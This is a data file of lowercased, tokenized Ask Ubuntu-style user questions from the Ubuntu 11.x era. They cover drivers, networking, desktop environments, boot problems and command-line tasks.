86995	which application controls the power management ?	i 'm using xmonad in ubuntu oneiric without the unity desktop . in 11.04 i launched manually the gnome-power-manager for controlling the laptop battery but in the new ubuntu this application is no longer available . which application controls now the power management in ubuntu ?
86996	can i use this laptop in ubuntu 11.10 ?	asus a53sv-sx538v technical : processor : intel core i7-2670qm ( 4x2 , 20 ghz / 6 mb cache ) . display / resolution : 15.6 `` glossy / 1366x768 . ram / hdd : 4 gb ddr3 ram / 500 gb ( 5400 rpm ) . graphics card : nvidia gt 540m with 2 gb ddr3 ( dedicated ) . dimensions / weight : 378x253x28 , 3 to 34.9 mm / 2.60 kg the graph that integrates a dedicated nvidia geforce gt 540m 2 gb of ddr3 memory , with which we can take current games with games at medium-high quality depending on the requirements of each title , you can look at a list of the games most prominent and of how to play with this chart here . includes optimus technology will allow us to save energy , thus extending the battery life if you do not need much graphics horsepower . with cuda instructions will help the processor complex calculations provided that the programs that implement them . regards , thanks .
87002	how can i get a startup application to run in another workspace other than # 1 ?	i want to startup an always run but seldom actually used application to start on another workspace , so i do n't have to manually do it each session start . can this be done , and if so , how ?
87003	intermittent internet connectivity	updated : i recently built a new computer and set it up to dual-boot windows 7 and ubuntu 11.10 . in windows , using the same hardware , my lan connectivity is solid . in ubuntu , however , my network interface periodically dies and resets itself ; i 'll have a solid connection for 30 seconds , and then it will go out for 30 seconds . when i tail the log : tail -f /var/log/kern.log i see `` eth0 link up '' messages appear periodically , corresponding with the return of connectivity . i posted the original question months ago , and misinterpreted what was going on . with a working internet connection in windows , i ignored the problem for some months . see my answer below for the solution ( drivers ) . original post in ubuntu , although i maintain a solid connection to my lan ( pinging the router ip address consistently returns a good result ) , my internet connectivity drops in and out . when i continuously ping 74.125.227.18 ( a google.com server ) , i get responses for a while , then i start getting `` destination host unreachable '' for a while , then i get responses again . this happens consistently , dropping the connection for about 30 seconds out of every minute or two . whether i configure my network via the network manager or via /etc/network/interfaces seems to make no difference . i configure with the following settings : address 192.168.1.101 network 192.168.1.0 gateway 192.168.1.99 ( my router 's ip address ) netmask 255.255.255.0 ( confirmed as the right netmask for the router ) broadcast 192.168.1.255 ( also confirmed with the router ) . ifconfig confirms that these settings are working : eth0 link encap : ethernet hwaddr 50 : e5:49:40 : da : a6 inet addr:192.168.1.101 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :52e5:49ff : fe40 : daa6/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:11557 errors:0 dropped:11557 overruns:0 frame:11557 tx packets:13117 errors:0 dropped:211 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:9551488 ( 9.5 mb ) tx bytes:1930952 ( 1.9 mb ) interrupt:41 base address:0xa000 i get the same issue when i use automatic dhcp address settings , although i did confirm that there is no other machine on the network with the static ip address i want to use . as i said , the connection to the local network stays solid - i never have any trouble pinging 192.168.1 . * - it 's internet addresses that i intermittently can not reach . it 's not a dns issue because pinging known ip addresses directly shows the same behavior . also , i do n't think it 's a hardware issue , as i never have any internet connectivity problems on the same machine in windows . the network hardware is built into the motherboard : gigabyte z68xp-ud3p . i managed to bring the os fully up to date , according to the update manager , but it did n't fix the issue , and with my limited understanding of network architecture i 'm at my wit 's end . the only clue i can see is that ifconfig is reporting a lot of dropped packets , but i 'm not sure what to do about it . update : it seems my problem is a little more generic than i described ; now when i try pinging my router and google simultaneously , they both go unreachable at the same time . running ifdown eth0 and then ifup eth0 brings it back temporarily ; if i just wait it comes back after a couple of minutes . i 'll broaden my search through intermittent network connectivity problems .
87012	how to restore the windows decoration after disabling windows buttons and global menu extensions ?	i have installed windows buttons extension from here and also have installed global menu extension from here . now after disabling them there is no menu-bar ( i , e , file , edit , ... ) and no title-bar ( i , e , no minimize , maximize , close buttons and no title ) when the window is maximized . âą i have restarted my computer , press alt+f2 and write r no thing happen . then what to do to restore them ? ? ?
87013	not able to connect to internet with mobile broadband	i just upgraded to ubuntu 11.10 from ubuntu 11.04 . my internet connection was worked fine with 11.04 but not able to connect in 11.10 . i have disable the firewall with `` sudo ufw disable '' still not able to connect . i have not modified any internet settings . i have enable the mobile broadband . i am using reliance broadband netconnect+ . any help on this gr8ly appreciated !
87014	permission denied : 'f : \\wubildr ' when install using wubi	i run into problem when tried to install ubuntu 11.10 on windows 7 using wubi installer . during installation popup with error similar to this appears : permission denied : for more details see the log file log file ends with the following error : 12-12 00:13 debug windowsbackend : copying c : \users\andrey\appdata\local\temp\pyl2dea.tmp\winboot - > d : \ubuntu\winboot 12-12 00:13 error tasklist : [ errno 13 ] permission denied : 'f : \\wubildr' traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\win32\backend.py '' , line 483 , in diskimage_bootloader file `` \lib\shutil.py '' , line 39 , in copyfile ioerror : [ errno 13 ] permission denied : 'f : \\wubildr' 12-12 00:13 debug tasklist : # cancelling tasklist 12-12 00:13 debug tasklist : # finished tasklist 12-12 00:13 error root : [ errno 13 ] permission denied : 'f : \\wubildr' traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 132 , in select_task file `` \lib\wubi\application.py '' , line 158 , in run_installer file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\win32\backend.py '' , line 483 , in diskimage_bootloader file `` \lib\shutil.py '' , line 39 , in copyfile ioerror : [ errno 13 ] permission denied : 'f : \\wubildr' issue was written about this here . is there any workaround around this ?
87020	kill a process at startup	so i switched to gnome shell on my 11.10 install . one annoyance is that whenever i insert a removable drive , nautilus opens the drive and at the same time gnome shell displays its popup . i discovered that killing the `` gnome-fallback-mount-helper '' process solves the issue . my question is : how can i kill the process at startup or better yet stop it from ever starting . thank you in advance !
87023	how to add recipes to cooking recipe programs ( gourmet recipe manager )	i am testing out the gourmet recipe manager but the instructions to add many recipes in one step are in an alien language since i have not yet been able to add a recipe . is there a place where i can just simply import a file and it adds many recipes .
87024	what 's the difference between mkfs and mkdosfs ?	i 'm trying to put a linux distro .iso on my usb and the instructions suggests using the following command to make a fat32 filesystem : mkdosfs -f 32 /dev/sdc1 is there a reason this command is to be used instead of mkfs ?
87025	mounting external hard drive in 11.10	i 'm trying to mount an external hitachi hard drive . supposedly it 's usb 3.0 and backwards compatible with 2.0 . i can see it with lsusb ( it 's `` simpletech '' ) : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 002 : id 045e:00dd microsoft corp . comfort curve keyboard 2000 v1.0 bus 002 device 003 : id 046d : c016 logitech , inc. optical wheel mouse bus 001 device 011 : id 4971:1013 simpletech additionally , the system appears to see it 's a `` high speed usb device '' , and it uses ehci_hcd . from `` dmesg | grep -i usb '' , plugging in and out a few times : [ 1914076.788026 ] usb 1-8 : new high speed usb device number 9 using ehci_hcd [ 1914118.992058 ] usb 1-8 : reset high speed usb device number 9 using ehci_hcd [ 1914466.772118 ] usb 1-8 : usb disconnect , device number 9 [ 1914478.188029 ] usb 1-7 : new high speed usb device number 10 using ehci_hcd [ 1914516.944023 ] usb 1-7 : reset high speed usb device number 10 using ehci_hcd [ 1914828.148003 ] usb 1-7 : usb disconnect , device number 10 [ 1914832.184073 ] usb 1-7 : new high speed usb device number 11 using ehci_hcd also , it shows up as /dev/sde . however , `` sudo fdisk -l '' does n't show it , gparted does n't see it , and `` sudo parted /dev/sde '' gives me `` no such device or address '' . i know the hard drive works , because i can use it in mac os x 10.6 ( it 's formatted fat32 ) . what can i do ?
87027	where are the window manager config files ?	where are the window manager config files ? in kubuntu-11.04
87028	changing ctrl-win-alt keys to win-alt-ctrl	coming from a mac , the standard modifier keys on linux ( and windows ) are pretty irritating . i need my thumb to be able to hit control so i need to change alt to control . i need the windows key out of the way so i need to change control to windows . i need alt in the middle so i need windows to become alt . i 've tried to do this via the keyboard layout control panel but it does n't seem to offer the right combination of options . i 've also tried via xmodmap but it seems even adding one keysym breaks my return and escape keys for no reason known to me . i 've searched around here but the only answers i can find involve swapping two keys rather than moving three around . any help would be much appreciated .
87030	game console emulators ( nintendo , super nintendo , sega genesis , nintendo 64 , gameboy ... )	what gaming console emulators are available in the latest 11.10 version . if my english is wrong about gaming console emulator i am referring to nintendo , super nintendo , sega genesis , gameboy and others in that genre . what emulators are available to be able to play rom games for this gaming consoles .
87035	how to check hard disk performance	how to check the performance of a hard drive ( either via terminal or gui ) . the write speed . the read speed . cache size and speed . random speed .
87037	gtk+ in kubuntu apps look bad	i have installed evolution email client on kubuntu 11.10 and it 's not so cute as expected . eclipse also looks bad . i have the gtk+ appearance plugin in kde system settings and already tried qtcurve and oxygen option , no help . when the gtk+ skin was working , this appearance still showed when i ran an application as root . tried : sudo apt-get install oxygen-molecule gtk2-engines-oxygen there is a problem with kde/gtk relation . how can i solve it ?
87040	how do i install mate ( the desktop environment ) ?	i have seen several youtube videos that are showing mate ( the gnome 2.x fork ) installed in 11.10 . how can i install it to test it out in 11.10 and above . if it helps the only sources i know of are : sourceforge github matsusoft note - i already know that mate is an evil spawn of gnome 2.x which is non-intuitive , unattractive and ugly for end users . it could scare your kids for life and kill the cat . but apart from this ( and the viruses , troyans , worms , spywares , security holes , mermaids , seamonkeys , narnian characters , lords of the ring dragons and whatnot as mentioned in the matsusoft site ) i still want to try it in a safe nuclear protected environment .
87043	how can i remap my f keys on my hp laptop ?	i have a laptop that has the f keys mapped to certain things - so f2 is lower brightness , f3 is brighter brightness , f6-f8 are multimedia keys , f9 is lower volume , f10 is raise , f11 is mute and f12 is turn off wireless . what 'd i 'd like to do is remap all of their current functions to fn+f-key , so i can have use of my f keys for other purposes . how can i do that ?
87045	how to run x server on other computer/other monitor ?	i have two laptop , and one external monitor , lcd . firstly , i want my primary display to run in runlevel 2 ( tty ) , and my external monitor to run on runlevel 3 ( xserver ) . we ca n't do this i presume ? i conclude it after searching in this forum . if it is , can i work still in runlevel 2 , but if i do need an x display , i would output it into my another laptop ... is't possible ? thanks
87048	how do i add tweetdeck to the unity launcher ?	i managed to get tweetdeck running on 11.04 . i installed a version of adobe air from the archive , then just copied the contents of /opt/tweetdeck in from another ubuntu 10.04 machine . now , i 'm trying to get the tweetdeck icon in the launcher , and failing miserably . any recommendations ?
87049	how to turn off thumbnail previews in nautilus ?	i would like to turn off automatic previews of pdf documents in ubuntu . nautilus calls evince pdf viewer to generate previews of pdf documents that can be displayed on the desktop and the file explorer . there are vulnerabilities in evince that can be exploited by malicious pdfs that would execute merely by viewing them in the file explorer . how can you turn off automatic previews in ubuntu ?
87054	ati/amd crossfire fan noise	i just got ubuntu 11.10 64bit setup on my system that 's a got a ati crossfire setup ( i already installed the proprietary ati drivers and catalyst with no issues ) however i do n't seem to be able to control the second video cards fan speed that seems to be running at max ( i have lm-sensors & fancontrol setup ) . # aticonfig -- pplib-cmd 'set fanspeed 1 31' pplib command execution has failed ! ati_pplib_cmd : execute `` set '' failed ! works just fine on the first card : # aticonfig -- pplib-cmd 'set fanspeed 0 31' pplib command execution is successful ! both cards are being detected as you can see here : crossfire chain for adapter 0 , status : enabled 0 . 0f:00.0 ati radeon hd 5900 series 1 . 0e:00.0 ati radeon hd 5900 series some help please .
87057	gnome-settings-daemon not starting when i login	sometime last week gnome-settings-daemon began not starting after login . this ends up causing my themes and hotkeys not to work . i can start it manually , but even when i do this , some settings are not respected ( like all my power settings ) . i read all the notes about having too fast a system ( core i7+ssd ) and although my system is fast , i do n't think this is what is happening because i made a new user and when i login as the new user everything works fine . i see a few segfaults of gnome-settings-daemon it in my logs , from 5 days ago , nothing recent . so my working theory is that something in my settings has caused it break since it works for another user just fine . in order to remedy this , i tried the following : reset unity settings ( unity -- reset , unity -- reset-icons ) '' reset '' gnome settings by deleting a bunch of . directories per directions here . are there other settings i 'm missing somewhere or other ideas to try here ? alternatively is moving to a new user account a good solution to this ?
87061	can i make tab auto-completion case-insensitive in the terminal ?	ubuntu 's terminal uses case-sensitive auto-completion , as i suppose would be expected for linux . but i think it would often be more convenient to use a case-insensitive one instead , to save you having to be accurate while starting a name , and would probably be worth the extra false positives . is it possible to change this behaviour ?
87063	trouble getting ruby on rails running on 11.10 ( rvm + passenger + apache2 )	i am running into some issues getting my ror production server up and running using rvm , passenger , and apache2 . i was wondering if anyone could help me out . i am new to ubuntu and it is also my first time setting up a production rails environment using rvm . right now with my current setup , when i try to connect to localhost/site-name i get requested url not found from apache . here are what my config files look like after having installed rvm , apache2 , and passenger . /etc/apache2/httpd.conf : loadmodule passenger_module /home/vmcilwain/.rvm/gems/ruby-1.9.2-p290/gems/passenger 3.0.11/ext/apache2/mod_passenger.so passengerroot /home/vmcilwain/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.11 passengerruby /home/vmcilwain/.rvm/wrappers/ruby-1.9.2-p290/ruby /etc/apache2/sites-available/vell : < virtualhost *:80 > ` servername vell documentroot `` /home/lmcilwain/vell/current/public '' errorlog `` /var/log/apache2/vell-error_log '' customlog `` /var/log/apache2/vell-access_log '' common < directory `` /var/www/sites/vell/current/public '' > options all allowoverride all order allow , deny allow from all < /directory > rewriteengine on # remove the www rewritecond % { http_host } ^vell $ [ nc ] rewriterule ^ ( . * ) $ http : //vell/ $ 1 [ r=301 , l ] < /virtualhost > i then create my rail app , run rake db : create to create my database then try to connect via the browser . which is where i am hitting my snag . any help is greatly appreciated and i apologize if this question was answered and i was not able to find it .
87064	how can i restore my previous version of linux after a bad video driver install ?	after i installed the ati/amd fglrx graphic drivers , the display output does n't work and my display goes to sleep . i installed the drivers through the additional drivers systems settings tool . i am able to change during the boot into to my previous patch version of linux . i 'm on 11.10 . thanks !
87070	nvidia gtx 460m laggy display	the best way to describe what is happening with words is to think of a video where if i grabbed my nautilus window and moved it from one side of the screen to the other . now think of that video and i removed lots of frames in the processes so the window basically starts where i grabbed in and everything in between is lost . i have a stock install with the nvidia drivers that got installed during the graphical installer . i had the issue so then i installed the `` post-release-updates '' and the problem still is n't fixed . lovin unity , but i have n't been able to use it since 10.xx any ideas ? this is the log after installing from nvidia site new xorg.log http : //pastebin.com/l2jrjcey
87074	how to kill the process that 'sudo kill -9 ' ca n't kill without reboot ?	i have tried to kill the process : sam @ sam-desktop : ~ $ ps -aux|grep sda warning : bad ps syntax , perhaps a bogus '- ' ? see http : //procps.sf.net/faq.html root 2898 0.0 0.0 0 0 ? s 11:39 0:00 [ jbd2/sda6-8 ] root 2899 0.0 0.0 2300 716 ? d 11:39 0:00 mount -t ext4 -o uhelper=udisks , nodev , nosuid /dev/sda6 /media/634bad56-5543-40fe-843b-cd31f4a95dba_ sam 2973 0.0 0.0 3328 876 pts/0 s+ 14:13 0:00 grep -- color=auto sda sam @ sam-desktop : ~ $ sudo kill -9 2898 sam @ sam-desktop : ~ $ sudo kill -9 2899 sam @ sam-desktop : ~ $ sudo killall -9 2898 2898 : no process found sam @ sam-desktop : ~ $ sudo killall -9 2899 2899 : no process found sam @ sam-desktop : ~ $ ps -aux|grep sda warning : bad ps syntax , perhaps a bogus '- ' ? see http : //procps.sf.net/faq.html root 2898 0.0 0.0 0 0 ? s 11:39 0:00 [ jbd2/sda6-8 ] root 2899 0.0 0.0 2300 716 ? d 11:39 0:00 mount -t ext4 -o uhelper=udisks , nodev , nosuid /dev/sda6 /media/634bad56-5543-40fe-843b-cd31f4a95dba_ sam 2987 0.0 0.0 3328 872 pts/0 s+ 14:22 0:00 grep -- color=auto sda sam @ sam-desktop : ~ $ after suggestions i tried : sam @ sam-desktop : ~ $ sudo umount -f /media/634bad56-5543-40fe-843b-cd31f4a95dba_ umount2 : invalid argument umount : /media/634bad56-5543-40fe-843b-cd31f4a95dba_ : not mounted sam @ sam-desktop : ~ $ sudo umount -l /media/634bad56-5543-40fe-843b-cd31f4a95dba_ umount : /media/634bad56-5543-40fe-843b-cd31f4a95dba_ : not mounted sam @ sam-desktop : ~ $
87077	how do i fix shadowing ? used gconf editor successfully , but after logout/restart panel shadow is gone !	i am running ubuntu 2d 11.10 . to enable shadowing i used gconf-editor and the gui for 2d settings here : how do i configure unity 2d ? everything seems to run well ; however , after restarting or log out , the shadow under the panel disappears . shadows do remain for windows , it is only the panel 's shadow that disappears . to bring it back , using either gconf editor by unchecking and re-checking either compositing_manager or compositor_effects or 2d gui settings does work , but unfortunately only for that session . every subsequent restart/login requires to use either gconf or the gui to bring the panel shadow back . any idea as to what may be causing the disappearance ? i really like how the shadowing makes ubuntu 2d look , but would rather not have to keep re-doing the process to enable shadowing for every session . thanks in advance !
87082	how do i kill a kernel thread ? and do i really want to do so ?	as i 've learned from this question , [ bracketed ] processes listed by the ps aux command are kernel threads . so is there a way to kill them from the command line ? if not , i guess the reason for that is to save the user from a higher risk of getting a kernel panic , right ?
87085	install web site in ubuntu server using samba	i 've installed ubuntu server in virtualbox running on windows for someone to test a cms . to make it easier managing the application , i decided to use samba to access apache 's document root . what configuration do i need to make , and how do i access from windows ? during installation i chose lamp and samba file server at the package selection step for this purpose .
87086	not all gnome shell features present after installation	i installed ubuntu 11.10 on virtualbox with the following specs : 1024 mb ram 128 vga 16 hdd then i tried to install gnome shell as in this omg ! ubuntu post . but i did n't get the same result . the shell seemed to be so basic ; i did n't get hot corners , for example .
87088	unity wo n't run on my pc	i installed ubuntu 10.10 netbook edition on my old pc , and it wo n't boot into the unity interface . instead , it shows an error ( something about my system being not good enough for unity ) - and boots into the legacy gnome interface . my specs : intel celeron 2.4ghz processor . 512mb ddr1 memory ( @ 400mhz ) , 20gb veteran ide hard disk , and an nvidia geforce 2 video card with 64mb vram . as you can see , my machine is well above the `` official '' requirements of ubuntu , and meets the `` official '' requirements for unity as well . what are the real ( tested ) hardware requirements for 10.10 with unity , and how do i get it to work ?
87090	how do i install drivers for an intel hd graphics ?	in system info in 11.10 , the graphics driver was n't detected . i use acer aspire 4750 with intel core i3-2340m and intel hd graphics 3000 graphic card how to install the driver for my ubuntu ?
87103	batch starting servers	how i can create a batch alias for bash ? i need to do this : cd /somefolder bundle exec unicorn -p 3000 rackup faye.ru -s thin -e production bundle and rackup - this is 2 servers for example i want bind alias z=*all_of_this*
87104	how do i install the lastest mesa driver in 11.10 ?	i 'm suffering from this bug : https : //bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-intel/+bug/829086 does anyone know how to fix this from reading the comments on the bug ? there is a proposed workaround but i do n't know how to compile things from source which you need to do to get the latest intel-gpu-tools . i thought it might be enough to install the latest mesa package but how do i that without adding all the extra content from xorg-edgers ppa ? i want just the updated mesa package but not the rest of the new content which the ppa will provide on a system update ( which has broken many people 's systems ) . thank you for your time !
87107	how do i go to the system menu in ubuntu 11.10	i do n't know how to go to the system menu on ubuntu 11.10 example for what i 'm talking about : system - > administration - > disk utility
87111	if i build a package from source how can i uninstall or remove completely ?	i used source code to build one package such as below : ./configure -- prefix=/usr -- sysconfdir=/etc -- localstatedir=/var -- libexecdir=/usr/lib -- with-package-name= '' myplugin '' -- with-package-origin= '' http : //www.ubuntu.org/ '' -- enable-gtk-doc -- disable-static make make install but unfortunately , i discovered that its the latest version , and has lot of bugs , so i need to remove it/uninstall it . but how can i do so ? i tried make clean ; make uninstall but still i see it exist : # pkg-config -- list-all | grep myplugin myplugin- ... . $ ls /usr/lib/myplugin/libxyz.so exist ... . how do you remove this now ?
87120	how can i configure a fax server ?	i would like to use an ubuntu 11.10 workstation as a fax server . what would be the best application to use ? how do i configure it to act as both a fax server and fax client ? i 've tried efax-gtk , but keep running into issues . it mostly seems that the program can not communicate with the modem . i 've tried 3 different internal modems . do i have to use an external modem via a serial port/com port ?
87130	how to start application in other workspaces ?	when i login how do i start an application to open on other workspaces ! for example ... system starting ... . workspace1 -- > open firefox ... workspace2 -- > open terminal ... . workspace3 -- > open movie ... etc .
87141	kernel panic while on battery power with a sony vaio vpcm120al	i 'm having serious problems with random kernel panics on my netbook , a sony vaio vpcm120al . i ca n't replicate the issue , but i 'm pretty sure it only happens when i 'm on battery power . i saw somewhere else that it may be something related to rt2800 wi-fi drivers and/or wi-fi power saving mode , but i ca n't see the problem on the system log . the log is here . the last panic happened around 10:41 . i hope someone can help me with this .
87142	safe to remove ... ?	i 'm trying to customize a livecd , but i ca n't manage to fit it on a normal cd . so i investigated , and came across a few files of which i do n't know if it 's safe to remove them . maybe you can help me there ? i do n't care if the files get recreated every time , as i remove them just before i start packing everything into a new iso . so it 'll still save me some space . the files : /var/cache/apt-xapian-index/index.1/postlist.db this file seems pretty useless to me , and it keeps growing every time . it 's now at a 38mb , while i could have sworn it was only 27mb the last time i checked . /var/cache/apt-xapian-index/index.1/termlist.db same story as postlist.db . the files in /var/lib/apt/lists/ seems to me that those are cached files which get automatically recreated when you run apt-get update , is this correct ? i do n't really dare to remove them unless i 'm sure in case i break something . all those files together are about 50mb . /boot/initrd.img-3.0.0-12-generic i 'm not at all sure of this one ... but does n't this file get automatically created when the user installs the system to his hard drive ? i thought the initrd.lz file in the casper directory inside the iso already contained the initrd stuff to boot the livecd . /var/cache/debconf/templates.dat does n't this automatically get recreated when some runs apt-get update ? the rest of the files inside /var/cache/apt-xapian-index/index.1 are n't they all cache files which automatically get recreated ? you do n't have to tell me about all the files in one answer . but if you know one or more of them , i 'd be grateful if you told me .
87143	setting side mouse buttons to `` back '' and `` forward '' in browser , nautilus , etc	i have a cyborg r.a.t.3 mouse with two side buttons . in windows , by default , those side buttons work as the `` back '' and `` forward '' buttons in apps like firefox , chrome , explorer , etc . how do i do the same for ubuntu ? my xorg.conf entry for the r.a.t.3 looks like this : # rat3 mouse section `` inputclass '' identifier `` mouse remap '' matchproduct `` saitek cyborg r.a.t.3 mouse '' matchdevicepath `` /dev/input/event* '' option `` buttonmapping '' `` 1 2 3 4 5 0 0 8 9 0 0 0 13 14 '' endsection ... with the `` back '' and `` forward '' buttons on my mouse being 8 and 9 respectively .
87149	intel hd 3000 ( sandy bridge ) 3d games problem	i ca n't play any 3d games on ubuntu 11.10 64 bit because of texture gliches , desktop looks ok but games terrible with intel hd 3000 . any solution for this ? the laptop is hp 4530s . exaple minecraft problem ( but it exist in every game ) http : //img51.imageshack.us/img51/2629/minecraftproblem.png
87152	update gcc4.5 from gcc4.4	can i update gcc-4.4 to gcc-4.5 without updating ubuntu 11.04 to ubuntu 11.10 ? if yes then how ?
87155	will there be a better alternative than uniy in future ?	i 'm running ubuntu for a long time and many of my students at our university switched from windows to your great os after my lessons . but after that forced update to unity you lost a lot of fans . many students came and asked what they should do . we tried gnome shell ( it 's much better than unity ) but it could not nearly compare to gnome 2.x ! if you go your way with unity in future you will only help microsoft and loose the leadership in linux distros . please give us gnome 2.x back - as soon as possible ! michael
87156	why is there no laptop certified under 64-bit ?	ubuntu has a hardware certification program ( http : //www.ubuntu.com/certification ) . if you search under release 11.10 and laptop , you will find that all are certified under 32-bit and none under 64-bit . in release 11.04 there are only two out of 107 laptops 64-bit certified . why is that the case ? and : if a laptop is only 32-bit certified , are there chances it will fail under the 64-bit release ?
87162	how to execute a .sh file when the session starts ?	i have a .sh file that i execute just going to the containing folder and writing ./file.sh . i want to execute that file when the session starts , so i create a symlink in /etc/init.d . i expected it was executed when i start the session but it does n't work.. the file has the `` x '' written next to the permissions , so i think it is executable . any help ? javi
87165	how do i make a bootable usb from windows ?	i 've downloaded the daily ubuntu 12.04 iso . i currently have windows 7 x64 operating system installed . how can i make a bootable usb from the ubuntu iso ?
87167	initctl wo n't start jobs	i am operating an ubuntu 11.10 server and one of the php scripts calls a bash script for inserting jobs and starting them . the script copies the job into /etc/init everything is fine except that the jobs do n't get started with sudo /sbin/initctl start my-tiny-job ( i think the reason is unknown job ) when i run the bash script by hand : php-user $ ./bashscript.sh then it works ! so this means the job file is correct . since this is a functionality called from a web interface i really need to know why this does n't work .
87169	using gnu screen with 256 colors	i recenetly installed gnu screen on a machine i ssh into . how do i get gnu screen to use 256 colors ? so far , i 've tried adding the following to my .screenrc : term screen-256color and attrcolor b `` .i '' # allow bold colors - necessary for some reason termcapinfo xterm 'co # 256 : ab=\e [ 48 ; 5 ; % dm : af=\e [ 38 ; 5 ; % dm ' # tell screen how to set colors . ab = background , af=foreground defbce on # use current bg color for erased chars but neither worked . in the login shell , before i start screen , when i run this script , which prints 256 colors , i get normal output . when i use the command tput colors i get the output 8 . when i start screen and run the script , i get 16 colors mapped to 256 colors - there are large blocks of solid color . when i run tput colors i get 256 ( when term screen-256color is in my .screenrc ) . edit : i got it to work - i did n't configure screen with the -- enable-colors256 option .
87172	install kamailio packages	i wan na install kamailio packages on ubuntu 11.10 . i 've found a tutorial for installing kamailio but i 'm facing problems installing packages after adding the repository lines to /etc/apt/sources.list and using : apt-get install kamailio kamailio-mysql-modules kamailio-tls-modules the following message appear : e : unable to locate package kamailio e : unable to locate package kamailio-mysql-modules e : unable to locate package kamailio-tls-modules this is the link for the tutorial
87177	how do i transfer archived email from the osx mail client to thunderbird ?	i am about to shift from a mac to ubuntu for business . i want to take my archived business emails from the mac mail client to a new ubuntu client ( e.g. , thunderbird , although i have n't investigated this much yet ) . is there an application for this ?
87179	firefox freezes for a minute when i attempt to drag a site into the bookmark toolbar	in firefox 8.0 on ubuntu 11.10 , when i drag a site from the address bar to the bookmarks toolbar ( in hopes of creating a new bookmark ) the entire system freezes for about 1.5 minutes . i can move the mouse around , but no clicks or keystrokes register until the end of the wait . oh , and i do n't get my bookmark . i can make them using the `` bookmark this page '' menu item . i get a similar freeze when i attempt to drag a link from a webpage into a text editor or other application .
87182	how to make a web browser ( e.g . firefox web browser ) embedded an gnome desktop in ubuntu 10.04	how to make a web browser ( e.g . firefox web browser ) embedded an gnome desktop workspace background and when system starts embedded web browser should be on the desktop
87183	i installed the kernel 3.1.2-030102-generic and the update manager proposes me to install the 3.0.0-14 kernel	on `` security updates '' of the update manager appears the following list : headers files relates to linux kernel version 3.0.0 ( linux-headers-3.0.0-14 - new installation ) linux kernel headers for version 3.0.0 on x86/x86_64 ( linux headers-3.0.0-14-generic - new installation ) generic linux kernel headers ( linux-headers-generic ) linux kernel headers for development ( linux-libc-dev ) do you advise me to install them even though i installed the kernel 3.1.2 ? or on the contrary i can ignore them without any problem ? i use ubuntu 11.10 . thank you very much in advance .
87185	why is it that when i maximize a window the screen becomes white ?	i 'm using ubuntu 11.10 and i installed my nvidia graphic driver . every thing is good except sometimes when i maximize a window , movie , a software or whatever all screen will become white and when i double click again and in small windows it becomes like normal again . this problem does not happen all the times , but why is that problem with maximized window ?
87187	11.10 randomly fails to boot on compaq presario r3000	help ! ! i currently have 10.04 and 11.10 installed on a compaq laptop . 10.10 boots first time , every time and apart from a wireless issue runs fine . 11.10 , however , does n't boot first time . boot up for 11.10 ( with unity ) is very random . when it boots , everything works fine but sometimes i need to reboot the pc 3 or 4 times before it kicks in . when it does n't boot , i am left with , either , a purple screen or a black screen ( with a flashing cursor in the top left hand corner ) and the laptop does n't respond to any combination of keys pressed . i guess i could just stick with 10.04 , but i really want to be using 11.10 and unity . any clues anybody ? laptop is a compaq presario r3000 series with nvidia geforce4 420 graphics . since posting this question , i have removed 10.04 ( lts ) and re-installed 11.10 only but am still experiencing the same intermittent boot issues . live cd 's always boot but once i have installed , whether ubuntu , kubuntu or xubuntu , the problem persists . usually , after install , when prompted to restart , the laptop fails to boot first time.i have tried nouveau and nvidia drivers with no change . point to note : on the first boot after install , the grub timeout of 10s shows but on rebooting again the timeout is not in the grub menu . i have also tried with and without security or recommended updates . 10.04 always boots . come on people ! ! first posted dec18 and still no suggestions ... .. edit : here is the bug https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/903961 a fix is being worked on currently , until then boot with acpi=off gksu gedit /etc/default/grub change this line grub_cmdline_linux_default= '' quiet splash acpi=off '' and run sudo update-grub
87190	unable to mark file as executable	using ubuntu 11.10 64bit . unable to mark files as executable if the files are in windows partition . but , working ok on home folder . ca n't tick the checkbox saying `` allow executing file as program '' . tried the command line option . but , no luck . i can write files on the windows partitions but cant change permissions of a file or folder .
87196	acer aspire one d257 laptop doesnt ' restart	i am using an acer netbook aspire one d257 . i have recently installed ubuntu 11.10 and whenever i restart it from ubuntu , it does not restart . it just sleeps and i have to force shut down to use it again . while this problem does not occur if i shut down , suspend or hibernate .
87200	gedit-dash not working anymore	i followed this tutorial on getting gedit dash installed but for some reason it does n't work anymore . i wrote a silent script that does everything automatically : cd /tmp sudo apt-get -y install python-pygments wget http : //dl.dropbox.com/u/7162902/gedit-dash.tar.gz mkdir -p ~/.local/share/gedit/plugins sudo file-roller gedit-dash.tar.gz -- extract-to=/home/username/.local/share/gedit/plugins and gedit-dash worked fine . but then it just stop working . when i go to the plugins menu , i select the dashboard , no errors , but i still do n't get gedit-dash ? note : zeitgeist and zeitgeist-extensions-fts are also installed
87201	how to deploy oracle forms 10g ?	en mi caso para poder desplegar forms de oracle 10g lo hago en windows xp mediante firefox 3.03 utilizando el jinitiator de oracle y el jre . he intentado hacer esto el ubuntu 10.04 y 11.10 mediante wine pero no he podido hacerlo . 多es posible hacerlo ? y 多como ? gracias . in my case in order to deploy oracle forms 10g on windows xp i do with firefox 3.3 using oracle jinitiator and jre . i tried this on ubuntu 10.04 and 11.10 through wine but i could not do it . can this be done ? and how ? thank you .
87203	grep for string not preceded by another string	is it possible , using grep , to search for instances of john smith but exclude instances of mr john smith ?
